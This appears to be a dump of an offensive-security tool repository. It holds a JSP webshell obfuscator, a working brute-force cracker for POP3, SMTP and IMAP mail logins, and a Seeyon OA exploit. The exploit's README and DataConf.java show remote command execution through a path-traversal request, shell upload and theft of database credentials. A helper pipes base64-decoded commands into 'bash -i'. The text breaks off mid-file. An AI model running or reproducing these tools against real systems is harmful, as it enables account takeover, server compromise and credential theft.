├── JspEncoder ├── README.md ├── pom.xml └── src │ └── main │ ├── java │ ├── cDataDecodeJspx.java │ ├── cDataEncodeJspx.java │ ├── classIn.java │ ├── classOut.java │ ├── decoderJsp.java │ ├── encoderJsp.java │ ├── htmlDecodeJspx.java │ ├── htmlEncodeJspx.java │ └── main.java │ └── resources │ └── META-INF │ └── MANIFEST.MF ├── MailBurst ├── MailBrust.py ├── README.md └── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── __pycache__ │ ├── __init__.cpython-38.pyc │ ├── imapBrust.cpython-38.pyc │ ├── imapsBrust.cpython-38.pyc │ ├── pop3Brust.cpython-38.pyc │ ├── pop3sBurst.cpython-38.pyc │ ├── smtpBurst.cpython-38.pyc │ └── smtpsBrust.cpython-38.pyc │ ├── imapBrust.py │ ├── imapsBrust.py │ ├── pop3Brust.py │ ├── pop3sBurst.py │ ├── smtpBurst.py │ └── smtpsBrust.py ├── PIC └── BkG.jpg ├── README.md └── SeeyonExp ├── README.md ├── pom.xml ├── src ├── META-INF │ └── MANIFEST.MF └── main │ ├── META-INF │ └── MANIFEST.MF │ └── java │ ├── DataConf.java │ ├── Decoder.java │ ├── Encoder.java │ ├── ExecuteCode.java │ ├── ExpMain.java │ ├── HTTPClient.java │ ├── JsonRead.java │ ├── SSLClient.java │ ├── Scanner.java │ ├── UploadShell.java │ └── VersionRecognition.java └── vul.json /JspEncoder/README.md: -------------------------------------------------------------------------------- 1 | # JspEncoder 2 | 3 | ### 0x00 开发日志 4 | 5 | 2020-11-16 V0.2 支持Jspx下HTML、CDATA实体编码 6 | 7 | 2020-11-6 V0.1 根据野外落地畸形unicode内存马判断编码方式，支持畸形unicode加解密 8 | 9 | ### 0x01 使用方法 10 | 11 | Jsp文件Unicode解码：java -jar JspEncoder.jar UniDe srcFile desFile 12 | 13 | Jsp文件Unicode编码：java -jar JspEncoder.jar UniEn srcFile desFile 14 | 15 | Jspx文件Html解码：java -jar JspEncoder.jar HtmlDe srcFile desFile 16 | 17 | Jspx文件Html编码：java -jar JspEncoder.jar HtmlEn srcFile desFile 18 | 19 | Jspx文件CDATA解码：java -jar JspEncoder.jar CdataDe srcFile desFile 20 | 21 | Jspx文件CDATA编码：java -jar JspEncoder.jar CdataEn srcFile desFile 22 | 23 | Base64文件输出为class文件：java -jar JspEncoder.jar ClassOut srcFile desFile 24 | 25 | class文件输出为Base64文件：java -jar JspEncoder.jar ClassIn srcFile desFile 26 | 27 | 使用参考：https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ 28 | 29 | ### 0x02 注意事项 30 | 31 | 在进行Unicode编码时请去掉jsp文件的类声明和引入声明模块，否则jsp文件将无法运行 32 | -------------------------------------------------------------------------------- /JspEncoder/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | JspEncoder 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | org.apache.maven.plugins 14 | maven-compiler-plugin 15 | 16 | 8 17 | 8 18 | 19 | 20 | 21 | 22 | 23 | 24 | org.jdom 25 | jdom 26 | 2.0.2 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /JspEncoder/src/main/java/cDataDecodeJspx.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | 3 | public class cDataDecodeJspx { 4 | public cDataDecodeJspx(String srcFile,String desFile) throws IOException { 5 | File fileIn = new File(srcFile); 6 | FileInputStream fis = new FileInputStream(fileIn); 7 | InputStreamReader streamReader = new InputStreamReader(fis); 8 | BufferedReader bufread = new BufferedReader(streamReader); 9 | String line; 10 | StringBuilder strB = new StringBuilder(); 11 | while ((line = bufread.readLine())!=null){ 12 | strB.append(line); 13 | } 14 | streamReader.close(); 15 | bufread.close(); 16 | String strRes = String.valueOf(strB); 17 | strRes = strRes.replaceAll("",""); 19 | File f = new File(desFile); 20 | FileWriter writer = new FileWriter(f); 21 | writer.write(""); 22 | writer.write(strRes); 23 | writer.close(); 24 | System.out.println("目标文件输出至" + desFile); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /JspEncoder/src/main/java/cDataEncodeJspx.java: -------------------------------------------------------------------------------- 1 | import org.jdom2.Document; 2 | import org.jdom2.Element; 3 | import org.jdom2.JDOMException; 4 | import org.jdom2.Namespace; 5 | import org.jdom2.input.SAXBuilder; 6 | import org.jdom2.output.XMLOutputter; 7 | import org.xml.sax.InputSource; 8 | 9 | import java.io.*; 10 | import java.util.List; 11 | 12 | public class cDataEncodeJspx { 13 | public cDataEncodeJspx(String srcFile,String desFile) throws IOException, JDOMException { 14 | SAXBuilder sb = new SAXBuilder(); 15 | Document doc = sb.build(new FileInputStream(srcFile)); 16 | Element root = doc.getRootElement(); 17 | Namespace namespace = root.getNamespace(); 18 | List list = root.getChildren("scriptlet",namespace); 19 | String result = ""; 20 | for (int i=0;i"; 26 | } 27 | element.setText(result); 28 | } 29 | List list1 = root.getChildren("declaration",namespace); 30 | result = ""; 31 | for (int i=0;i"; 37 | } 38 | element.setText(result); 39 | } 40 | XMLOutputter outputter = new XMLOutputter(); 41 | outputter.output(doc,new FileOutputStream(desFile)); 42 | File fileIn = new File(desFile); 43 | FileInputStream fis = new FileInputStream(fileIn); 44 | InputStreamReader streamReader = new InputStreamReader(fis); 45 | BufferedReader bufread = new BufferedReader(streamReader); 46 | String line; 47 | StringBuilder strB = new StringBuilder(); 48 | while ((line = bufread.readLine())!=null){ 49 | strB.append(line); 50 | } 51 | streamReader.close(); 52 | bufread.close(); 53 | String strRes = String.valueOf(strB); 54 | strRes = strRes.replaceAll("<","<"); 55 | strRes = strRes.replaceAll(">",">"); 56 | File f = new File(desFile); 57 | FileWriter writer = new FileWriter(f); 58 | writer.write(""); 59 | writer.write(strRes); 60 | writer.close(); 61 | System.out.println("[!]文件编码完成，已输出至" + desFile); 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /JspEncoder/src/main/java/classIn.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.util.Base64; 3 | 4 | public class classIn { 5 | public classIn(String srcFile, String desFile) throws IOException, InterruptedException { 6 | if (System.getProperties().getProperty("os.name").startsWith("win")||System.getProperties().getProperty("os.name").startsWith("Win")){ 7 | Runtime.getRuntime().exec("cmd /c" + "certutil -f -encode" + " " +srcFile + " " +desFile); 8 | Thread.sleep(3*1000); 9 | BufferedReader in = new BufferedReader(new FileReader(desFile)); 10 | String str = ""; 11 | String result = ""; 12 | while ((str = in.readLine())!=null){ 13 | result = result + str; 14 | } 15 | in.close(); 16 | result = result.replaceAll("\\\\r",""); 17 | result = result.replaceAll("\\\\n",""); 18 | result = result.replace("-----BEGIN CERTIFICATE-----",""); 19 | result = result.replace("-----END CERTIFICATE-----",""); 20 | File file = new File(desFile); 21 | FileWriter fileWriter = new FileWriter(file); 22 | BufferedWriter bw = new BufferedWriter(fileWriter); 23 | bw.write(result); 24 | bw.close(); 25 | fileWriter.close(); 26 | System.out.println("[!]文件已base64编码到" + desFile); 27 | }else { 28 | String execString = "cat " + srcFile +" |base64 >" +desFile; 29 | byte[] execByte = execString.getBytes(); 30 | String execBase = Base64.getEncoder().encodeToString(execByte); 31 | Runtime.getRuntime().exec("bash -c {echo," + execBase.trim()+ "}|{base64,-d}|{bash,-i}"); 32 | System.out.println("[!]文件已base64编码到" + desFile); 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /JspEncoder/src/main/java/classOut.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.lang.reflect.InvocationTargetException; 3 | 4 | class classOut { 5 | public classOut(String srcFile,String desFile) throws ClassNotFoundException, NoSuchMethodException, IOException, InvocationTargetException, IllegalAccessException { 6 | FileInputStream fis = new FileInputStream(srcFile); //文件输入流 7 | InputStreamReader isr = new InputStreamReader(fis); //输入流读取器 8 | BufferedReader br = new BufferedReader(isr); 9 | String line = ""; 10 | String text = ""; 11 | while ((line = br.readLine())!= null){ 12 | text = text + line; 13 | } 14 | ClassLoader clzLoader = Thread.currentThread().getContextClassLoader(); 15 | byte[] bytecode = null; 16 | Class base64Clz = clzLoader.loadClass("java.util.Base64"); 17 | Class decoderClz = clzLoader.loadClass("java.util.Base64$Decoder"); 18 | Object decoder = base64Clz.getMethod("getDecoder").invoke(base64Clz); 19 | bytecode = (byte[]) decoderClz.getMethod("decode", String.class).invoke(decoder, text); 20 | OutputStream out = new FileOutputStream(desFile); 21 | InputStream is = new ByteArrayInputStream(bytecode); 22 | byte[] buff = new byte[1024]; 23 | int len = 0; 24 | while ((len = is.read(buff)) != -1){ 25 | out.write(buff,0,len); 26 | } 27 | is.close(); 28 | out.close(); 29 | System.out.println("[!]Class文件已输出至" + desFile); 30 | } 31 | 32 | } 33 | -------------------------------------------------------------------------------- /JspEncoder/src/main/java/decoderJsp.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.math.BigInteger; 3 | public class decoderJsp { 4 | public decoderJsp(String srcFile, String desFile) throws IOException { 5 | FileInputStream fis = new FileInputStream(srcFile); //文件输入流 6 | InputStreamReader isr = new InputStreamReader(fis); //输入流读取器 7 | BufferedReader br = new BufferedReader(isr); 8 | String line = ""; 9 | String text = ""; 10 | while ((line = br.readLine())!= null){ 11 | text = text + line; 12 | } 13 | String regex = "\\\\u+"; 14 | String result = text.replaceAll(regex,"\\\\u"); 15 | String[] split = result.split("\\\\u"); 16 | String result1 = ""; 17 | for (int i=0;i"; 40 | FileWriter writer = new FileWriter(desFile); 41 | writer.write(""); 42 | writer.write(result); 43 | writer.flush(); 44 | writer.close(); 45 | System.out.println("[!]文件编码完成，已输出至" + desFile); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /JspEncoder/src/main/java/htmlDecodeJspx.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | 3 | public class htmlDecodeJspx { 4 | public htmlDecodeJspx(String srcFile,String desFile) throws IOException { 5 | File fileIn = new File(srcFile); 6 | FileInputStream fis = new FileInputStream(fileIn); 7 | InputStreamReader streamReader = new InputStreamReader(fis); 8 | BufferedReader bufread = new BufferedReader(streamReader); 9 | String line; 10 | StringBuilder strB = new StringBuilder(); 11 | while ((line = bufread.readLine())!=null){ 12 | strB.append(line); 13 | } 14 | streamReader.close(); 15 | bufread.close(); 16 | String strRes = String.valueOf(strB); 17 | String result = ""; 18 | String nowStr = ""; 19 | String[] valueArray = strRes.split("&"); 20 | for (int i=0;i 可选参数为:") 11 | print("\n\t 暴破格式：python MailBrust.py pop.qq.com POP3 username.txt password.txt 110") 12 | print("\n\t 最后的端口参数取决于邮箱服务器，110为任意端口值，可以进行修改") 13 | sys.exit(1) 14 | protocolDict = {'POP3': 110, 'SMTP': 25, 'IMAP': 143, 'POP3S': 995, 'SMTPS': 465, 'IMAPS': 993} 15 | mailAddr = sys.argv[1] 16 | mailProt = sys.argv[2] 17 | mailPort = protocolDict[mailProt] 18 | if len(sys.argv) == 6: 19 | mailPort = int(sys.argv[5]) 20 | try: 21 | userLines = open(sys.argv[3], "r").readlines() 22 | except(IOError): 23 | print("[-]错误信息:请检查文件路径\n") 24 | try: 25 | passLines = open(sys.argv[4], "r").readlines() 26 | except(IOError): 27 | print("[-]错误信息:请检查文件路径\n") 28 | if sys.argv[2] == "POP3": 29 | pop3Thread = pop3Brust.pop3Brust(mailAddr, mailPort, userLines, passLines) 30 | pop3Thread.start() 31 | pop3Thread.join() 32 | print("[-]提示信息:破解完毕") 33 | if sys.argv[2] == "POP3S": 34 | pop3sThread = pop3sBurst.pop3sBrust(mailAddr, mailPort, userLines, passLines) 35 | pop3sThread.start() 36 | pop3sThread.join() 37 | print("[-]提示信息:破解完毕") 38 | if sys.argv[2] == "SMTP": 39 | smtpThread = smtpBurst.smtpBurst(mailAddr, mailPort, userLines, passLines) 40 | smtpThread.start() 41 | smtpThread.join() 42 | print("[-]提示信息:破解完毕") 43 | if sys.argv[2] == "SMTPS": 44 | smtpsThread = smtpsBrust.smtpsBurst(mailAddr, mailPort, userLines, passLines) 45 | smtpsThread.start() 46 | smtpsThread.join() 47 | print("[-]提示信息:破解完毕") 48 | if sys.argv[2] == "IMAP": 49 | imapThread = imapBrust.imapBrust(mailAddr, mailPort, userLines, passLines) 50 | imapThread.start() 51 | imapThread.join() 52 | print("[-]提示信息:破解完毕") 53 | if sys.argv[2] == "IMAPS": 54 | imapsThread = imapsBrust.imapsBrust(mailAddr, mailPort, userLines, passLines) 55 | imapsThread.start() 56 | imapsThread.join() 57 | print("[-]提示信息:破解完毕") 58 | if __name__ == '__main__': 59 | start() -------------------------------------------------------------------------------- /MailBurst/README.md: -------------------------------------------------------------------------------- 1 | # MailBrust 2 | 3 | ### 0x00 开发日志 4 | 5 | 2020-8-13 V0.2 增加多线程异步 6 | 7 | 2020-8-11 V0.1 单线程全协议邮箱用户名密码暴力破解 8 | 9 | ### 0x01 使用方法 10 | 11 | POP3协议暴力破解：python MailBrust.py xxx.com POP3 username.txt password.txt 12 | 13 | POP3S协议暴力破解：python MailBrust.py xxx.com POP3S username.txt password.txt 14 | 15 | SMTP协议暴力破解：python MailBrust.py xxx.com SMTP username.txt password.txt 16 | 17 | SMTPS协议暴力破解：python MailBrust.py xxx.com SMTPS username.txt password.txt 18 | 19 | IMAP协议暴力破解：python MailBrust.py xxx.com IMAP username.txt password.txt 20 | 21 | IMAPS协议暴力破解：python MailBrust.py xxx.com IMAPS username.txt password.txt 22 | 23 | 使用参考：https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ 24 | -------------------------------------------------------------------------------- /MailBurst/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__init__.py -------------------------------------------------------------------------------- /MailBurst/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__init__.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/imapBrust.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/imapBrust.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/imapsBrust.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/imapsBrust.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/pop3Brust.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/pop3Brust.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/pop3sBurst.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/pop3sBurst.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/smtpBurst.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/smtpBurst.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/__pycache__/smtpsBrust.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/smtpsBrust.cpython-38.pyc -------------------------------------------------------------------------------- /MailBurst/lib/imapBrust.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import imaplib 3 | import threading 4 | import asyncio 5 | 6 | class imapBrust(threading.Thread): 7 | def __init__(self,mailAddr, mailPort, userLines,passLines): 8 | threading.Thread.__init__(self) 9 | self.mailAddr = mailAddr 10 | self.mailPort = mailPort 11 | self.userLines = userLines 12 | self.passLines = passLines 13 | def run(self): 14 | try: 15 | imaplib.IMAP4(self.mailAddr, self.mailPort) 16 | except: 17 | print("[-]错误信息:服务器错误！") 18 | return 1 19 | if len(self.userLines) < 1 or len(self.passLines) < 1: 20 | print("[-]错误信息:字典文件中无内容，请检查！") 21 | return 1 22 | for index in range(len(self.userLines)): 23 | for i in range(len(self.passLines)): 24 | threadLock.acquire() 25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index],self.passLines[i])) 26 | threadLock.release() 27 | continue 28 | async def login(mailAddr,mailPort,username,password): 29 | try: 30 | username = username.replace("\n", "") 31 | password = password.replace("\n", "") 32 | imapServer = imaplib.IMAP4(mailAddr, mailPort) 33 | imapServer.login(username, password) 34 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 35 | except: 36 | try: 37 | username = username.replace("\n", "") 38 | password = password.replace("\n", "") 39 | imapServer = await imaplib.IMAP4(mailAddr, mailPort) 40 | imapServer.login_cram_md5(username, password) 41 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 42 | except: 43 | print("[-]错误信息:密码错误!") 44 | threadLock = threading.Lock() 45 | loop = asyncio.get_event_loop() -------------------------------------------------------------------------------- /MailBurst/lib/imapsBrust.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import imaplib 3 | import threading 4 | import asyncio 5 | 6 | class imapsBrust(threading.Thread): 7 | def __init__(self,mailAddr, mailPort, userLines, passLines): 8 | threading.Thread.__init__(self) 9 | self.mailAddr = mailAddr 10 | self.mailPort = mailPort 11 | self.userLines = userLines 12 | self.passLines = passLines 13 | def run(self): 14 | try: 15 | imaplib.IMAP4_SSL(self.mailAddr, self.mailPort) 16 | except: 17 | print("[-]错误信息:服务器错误！") 18 | return 1 19 | if len(self.userLines) < 1 or len(self.passLines) < 1: 20 | print("[-]错误信息:字典文件中无内容，请检查！") 21 | return 1 22 | for index in range(len(self.userLines)): 23 | for i in range(len(self.passLines)): 24 | threadLock.acquire() 25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index], self.passLines[i])) 26 | threadLock.release() 27 | continue 28 | async def login(mailAddr,mailPort,username,password): 29 | try: 30 | username = username.replace("\n", "") 31 | password = password.replace("\n", "") 32 | imapServer = imaplib.IMAP4_SSL(mailAddr, mailPort) 33 | imapServer.login(username, password) 34 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 35 | except: 36 | try: 37 | username = username.replace("\n", "") 38 | password = password.replace("\n", "") 39 | imapServer = await imaplib.IMAP4_SSL(mailAddr, mailPort) 40 | imapServer.login_cram_md5(username, password) 41 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 42 | except: 43 | print("[-]错误信息:密码错误!") 44 | threadLock = threading.Lock() 45 | loop = asyncio.get_event_loop() -------------------------------------------------------------------------------- /MailBurst/lib/pop3Brust.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import poplib 3 | import threading 4 | import asyncio 5 | 6 | class pop3Brust(threading.Thread): 7 | def __init__(self,mailAddr, mailPort, userLines, passLines): 8 | threading.Thread.__init__(self) 9 | self.mailAddr = mailAddr 10 | self.mailPort = mailPort 11 | self.userLines = userLines 12 | self.passLines = passLines 13 | def run(self): 14 | try: 15 | poplib.POP3(self.mailAddr, self.mailPort) 16 | except: 17 | print("[-]错误信息:服务器错误！") 18 | return 1 19 | if len(self.userLines) < 1 or len(self.passLines) < 1: 20 | print("[-]错误信息:字典文件中无内容，请检查！") 21 | return 1 22 | for index in range(len(self.userLines)): 23 | for i in range(len(self.passLines)): 24 | threadLock.acquire() 25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index], self.passLines[i])) 26 | threadLock.release() 27 | continue 28 | async def login(mailAddr,mailPort,username,password): 29 | try: 30 | username = username.replace("\n", "") 31 | password = password.replace("\n", "") 32 | pop3Server = await poplib.POP3(mailAddr, mailPort) 33 | pop3Server.user(username) 34 | pop3Server.pass_(password) 35 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 36 | except: 37 | print("[-]错误信息:密码错误!") 38 | threadLock = threading.Lock() 39 | loop = asyncio.get_event_loop() -------------------------------------------------------------------------------- /MailBurst/lib/pop3sBurst.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import poplib 3 | import threading 4 | import asyncio 5 | 6 | class pop3sBrust(threading.Thread): 7 | def __init__(self,mailAddr, mailPort, userLines, passLines): 8 | threading.Thread.__init__(self) 9 | self.mailAddr = mailAddr 10 | self.mailPort = mailPort 11 | self.userLines = userLines 12 | self.passLines = passLines 13 | def run(self): 14 | try: 15 | poplib.POP3_SSL(self.mailAddr, self.mailPort) 16 | except: 17 | print("[-]错误信息:服务器错误！") 18 | return 1 19 | if len(self.userLines) < 1 or len(self.passLines) < 1: 20 | print("[-]错误信息:字典文件中无内容，请检查！") 21 | return 1 22 | for index in range(len(self.userLines)): 23 | for i in range(len(self.passLines)): 24 | threadLock.acquire() 25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index], self.passLines[i])) 26 | threadLock.release() 27 | continue 28 | async def login(mailAddr,mailPort,username,password): 29 | try: 30 | username = username.replace("\n", "") 31 | password = password.replace("\n", "") 32 | pop3Server = await poplib.POP3_SSL(mailAddr, mailPort) 33 | pop3Server.user(username) 34 | pop3Server.pass_(password) 35 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 36 | except: 37 | print("[-]错误信息:密码错误!") 38 | threadLock = threading.Lock() 39 | loop = asyncio.get_event_loop() -------------------------------------------------------------------------------- /MailBurst/lib/smtpBurst.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import smtplib 3 | import threading 4 | import asyncio 5 | import time 6 | 7 | 8 | class smtpBurst(threading.Thread): 9 | def __init__(self, mailAddr, mailPort, userLines, passLines): 10 | threading.Thread.__init__(self) 11 | self.mailAddr = mailAddr 12 | self.mailPort = mailPort 13 | self.userLines = userLines 14 | self.passLines = passLines 15 | 16 | def run(self): 17 | try: 18 | smtplib.SMTP(self.mailAddr, self.mailPort) 19 | except: 20 | print("[-]错误信息:服务器错误！") 21 | return 1 22 | if len(self.userLines) < 1 or len(self.passLines) < 1: 23 | print("[-]错误信息:字典文件中无内容，请检查！") 24 | return 1 25 | for index in range(len(self.userLines)): 26 | for i in range(len(self.passLines)): 27 | threadLock.acquire() 28 | loop.run_until_complete(login(self.mailAddr, self.mailPort, self.userLines[index], self.passLines[i])) 29 | threadLock.release() 30 | continue 31 | 32 | 33 | async def login(mailAddr, mailPort, username, password): 34 | try: 35 | username = username.replace("\n", "") 36 | password = password.replace("\n", "") 37 | smtpServer = await smtplib.SMTP(mailAddr, mailPort) 38 | smtpServer.login(username, password) 39 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 40 | except: 41 | print("[-]错误信息:密码错误!") 42 | 43 | 44 | threadLock = threading.Lock() 45 | loop = asyncio.get_event_loop() 46 | -------------------------------------------------------------------------------- /MailBurst/lib/smtpsBrust.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import smtplib 3 | import threading 4 | import asyncio 5 | 6 | class smtpsBurst(threading.Thread): 7 | def __init__(self, mailAddr, mailPort, userLines, passLines): 8 | threading.Thread.__init__(self) 9 | self.mailAddr = mailAddr 10 | self.mailPort = mailPort 11 | self.userLines = userLines 12 | self.passLines = passLines 13 | def run(self): 14 | try: 15 | smtplib.SMTP_SSL(self.mailAddr, self.mailPort) 16 | except: 17 | print("[-]错误信息:服务器错误！") 18 | return 1 19 | if len(self.userLines) < 1 or len(self.passLines) < 1: 20 | print("[-]错误信息:字典文件中无内容，请检查！") 21 | return 1 22 | for index in range(len(self.userLines)): 23 | for i in range(len(self.passLines)): 24 | threadLock.acquire() 25 | loop.run_until_complete(login(self.mailAddr, self.mailPort, self.userLines[index], self.passLines[i])) 26 | threadLock.release() 27 | continue 28 | 29 | async def login(mailAddr, mailPort, username, password): 30 | try: 31 | username = username.replace("\n", "") 32 | password = password.replace("\n", "") 33 | smtpServer = await smtplib.SMTP_SSL(mailAddr, mailPort) 34 | smtpServer.login(username, password) 35 | print("[-]密码正确" + "账户名:" + username + "密码:" + password) 36 | except: 37 | print("[-]错误信息:密码错误!") 38 | threadLock = threading.Lock() 39 | loop = asyncio.get_event_loop() -------------------------------------------------------------------------------- /PIC/BkG.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/PIC/BkG.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ATT-CK-Tools-library 2 | 3 | ![](./PIC/BkG.jpg) 4 | 5 | # 声明 6 | 本项目工具仅供测试使用，请勿用于违法用途，否则后果自负！ 7 | -------------------------------------------------------------------------------- /SeeyonExp/README.md: -------------------------------------------------------------------------------- 1 | # SeeyonExp 2 | 3 | ### 0x00 开发日志 4 | 5 | 2021-3-13 V0.9 增加多个受影响版本，修复HTTPS无法指定端口bug 6 | 7 | 2021-2-2 V0.8 新增影响版本v6.1 8 | 9 | 2021-1-10 V0.7 增加识别版本后无损检测漏洞功能，有那么点漏扫的意思 10 | 11 | 2020-11-11 V0.6 增加数据库配置文件读取功能 12 | 13 | 2020-11-10 V0.5 增加回显流量加密功能，Base64与ascii结合，Base65 14 | 15 | 2020-11-2 V0.4 解决命令执行for循环无法执行for之后Java代码的bug，分号的神奇作用 16 | 17 | 2020-10-30 V0.3 增加文件上传功能，Base64不编码写入不了，黑名单校验 18 | 19 | 2020-10-22 V0.2 命令可以在windows与Linux下执行，并支持https 20 | 21 | 2020-10-20 V0.1 根据POC写出初步利用，可以执行命令，但是仅在windows与http下 22 | 23 | ### 0x01 使用方法 24 | 25 | 无损检验是否存在漏洞：java -jar seeyon.jar scan http/https://xxxx.com:port/seeyon 26 | 27 | 执行命令：java -jar seeyon.jar http/https://xxxx.com:port/seeyon cmd 28 | 29 | 写入shell：java -jar seeyon.jar http/https://xxxx.com:port/seeyon shell srcFile desFile 30 | 31 | 读取数据库配置文件：java -jar seeyon.jar http/https://xxxx.com:port/seeyon dataConf 32 | 33 | 流量解码：java -jar seeyon.jar decode ciphertext 34 | 35 | 流量编码：java -jar seeyon.jar encode Plaintext 36 | 37 | 使用参考：https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ 38 | -------------------------------------------------------------------------------- /SeeyonExp/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | groupId 8 | Seeyon 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | org.apache.maven.plugins 14 | maven-compiler-plugin 15 | 16 | 7 17 | 7 18 | 19 | 20 | 21 | 22 | 23 | 24 | commons-codec 25 | commons-codec 26 | 1.15 27 | 28 | 29 | org.apache.httpcomponents 30 | httpclient 31 | 4.5.13 32 | 33 | 34 | org.json 35 | json 36 | 20180813 37 | 38 | 39 | -------------------------------------------------------------------------------- /SeeyonExp/src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: ExpMain 3 | 4 | -------------------------------------------------------------------------------- /SeeyonExp/src/main/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: ExpMain 3 | 4 | -------------------------------------------------------------------------------- /SeeyonExp/src/main/java/DataConf.java: -------------------------------------------------------------------------------- 1 | import java.util.UUID; 2 | 3 | public class DataConf { 4 | public void DataConf(String oaUrl) throws Exception { 5 | HTTPClient httpClient = new HTTPClient(); 6 | String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"; 7 | UUID uuid = UUID.randomUUID(); 8 | String uuidStr = uuid.toString(); 9 | uuidStr = uuidStr.replace("-", ""); 10 | String getUrl = oaUrl + "/" + uuidStr + ".txt"; 11 | String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt"; 12 | String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt"; 13 | String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt"; 14 | String winReadDadaConf = "cd ../../base/conf & type datasourceCtp.properties"; 15 | String linReadDadaConf = "cat ../../base/conf/datasourceCtp.properties"; 16 | String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + winReadDadaConf + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + linReadDadaConf + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();System.out.println(sbStr);sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = 